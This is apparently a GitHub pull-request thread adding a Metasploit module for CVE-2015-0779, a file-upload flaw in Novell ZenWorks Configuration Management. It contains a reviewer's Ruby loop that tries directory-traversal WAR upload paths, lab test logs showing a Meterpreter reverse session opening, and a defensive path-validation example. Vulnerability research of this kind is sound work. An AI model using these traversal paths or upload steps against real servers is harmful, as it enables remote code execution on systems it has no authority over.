
Create exploit for CVE-2015-0779 #5096

Merged
merged 3 commits into from May 1, 2015
Conversation

pedrib (Contributor) commented Apr 7, 2015

This is an exploit for CVE-2015-0779, a file upload vulnerability in ZenWorks Configuration Management up to and including 11.3.1.
This exploit works on Windows, Linux and the Virtual Appliance, which can be downloaded from Novell's website. It has been extensively tested on all platforms.

I'll add the full disclosure and OSVDB links once they become available, but otherwise it is ready to go on my side.

@pedrib changed the title from "CVE-2015-0779" to "Create exploit for CVE-2015-0779" on Apr 7, 2015

pedrib (Contributor, Author) commented Apr 9, 2015

Added the OSVDB and full disclosure URLs, good to go!

pedrib (Contributor, Author) commented May 1, 2015

Bump? Do you need anything else, please let me know!

@jvazquez-r7 self-assigned this on May 1, 2015

Review comment (Contributor) on the line "def exploit":

I feel like it should be something like:

```ruby
# Build the list of candidate Tomcat webapps directories: the user-supplied
# TOMCAT_PATH first (if set), then the known defaults.
tomcat_paths = []
if datastore['TOMCAT_PATH']
  tomcat_paths << datastore['TOMCAT_PATH']
end
tomcat_paths.concat([ '../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/' ])

# Try each path in turn and stop as soon as a session comes back.
tomcat_paths.each do |tomcat_path|
  upload_war_and_exec(tomcat_path)
  break if session_created?
end
```

@jvazquez-r7 (Contributor)

Testing; if it works I can do the cleanup myself, looks like minor things :)

@jvazquez-r7 (Contributor)

Module works:

```
msf exploit(zcm_file_upload) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.132:443 - Uploading WAR file to ../../../opt/novell/zenworks/share/tomcat/webapps/
[-] 172.16.158.132:443 - Failed to upload, try again with a different path?
[*] 172.16.158.132:443 - Uploading WAR file to ../webapps/
[*] 172.16.158.132:443 - Upload appears to have been successful, waiting 15 seconds for deployment
[*] 172.16.158.132:443 - Executing payload, wait for session...
[*] Sending stage (30680 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:1119) at 2015-05-01 13:00:35 -0500

meterpreter > getuid
sServer username: __z_158_132__
ymeterpreter > syssinfo
[-] Unknown command: syssinfo.
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter >
```

I tested it against a ZCM 10.2 ISO I had in the archives. I'll do the final cleanup myself and land it in a while! Thanks!
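The two destinations the module output above shows being tried are both directory-traversal names. As an added, defender-side example (not the module's code and not ZCM's), here is the destination check an upload handler needs so that such names cannot leave the intended directory; UPLOAD_ROOT is a constructed, hypothetical location, and the check goes a little beyond the two page paths by also handling backslashes, NUL bytes and '~' expansion.

```ruby
# Added example (not the module's or ZCM's code). UPLOAD_ROOT is a constructed,
# hypothetical directory an upload handler is meant to write into.
UPLOAD_ROOT = '/opt/novell/zenworks/share/tomcat/work/uploads'.freeze

# Returns the canonical absolute path for +name+ if it stays inside +root+,
# or nil when it must be rejected. String-only; no disk access.
def safe_upload_destination(name, root = UPLOAD_ROOT)
  return nil if name.nil? || name.empty?
  return nil if name.include?("\0")              # NUL truncates names in C-level APIs
  # Treat backslashes as separators too: a handler on Windows sees '..\webapps\'
  # as traversal, and File.expand_path on Linux would otherwise keep it literal.
  normalized = name.gsub('\\', '/')
  return nil if normalized.start_with?('/', '~')  # absolute paths and '~user' expansion
  root_abs = File.expand_path(root)
  dest = File.expand_path(normalized, root_abs)   # collapses '.', '..' and repeated '/'
  # Compare with a trailing separator so '/x/uploads2' is not accepted for '/x/uploads'.
  return nil unless dest.start_with?(root_abs + File::SEPARATOR)
  dest
end

# Labels each candidate name :allowed or :rejected. The first two names in the
# demo list are the destinations tried in the output above; the rest are constructed.
def classify_upload_names(names)
  names.each_with_object({}) do |n, out|
    out[n] = safe_upload_destination(n) ? :allowed : :rejected
  end
end

if __FILE__ == $PROGRAM_NAME
  demo = ['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/',
          'report.zip', 'sub/../report.zip', '/etc/passwd', '..\\webapps\\x.war']
  classify_upload_names(demo).each { |n, v| puts "#{v.to_s.ljust(8)} #{n}" }
end
```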

@jvazquez-r7 merged commit 4808d61 into rapid7:master on May 1, 2015

@jvazquez-r7 (Contributor)

Landed finally! Had some problems with my ZCM installation, had to reinstall!

Final commit: a531ad9

Final test:

```
msf exploit(zenworks_configuration_management_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:443 - Uploading WAR file to ../../../opt/novell/zenworks/share/tomcat/webapps/
[-] 172.16.158.133:443 - Failed to upload, try again with a different path?
[*] 172.16.158.133:443 - Uploading WAR file to ../webapps/
[*] 172.16.158.133:443 - Upload appears to have been successful
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30680 bytes) to 172.16.158.133
[*] 172.16.158.133:443 - Attempting to launch payload in deployed WAR...

meterpreter > getuid
sServer username: __z_158_133__
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit -y
```

Thanks @pedrib !

@pedrib deleted the CVE-2015-0779 branch on February 1, 2017 00:39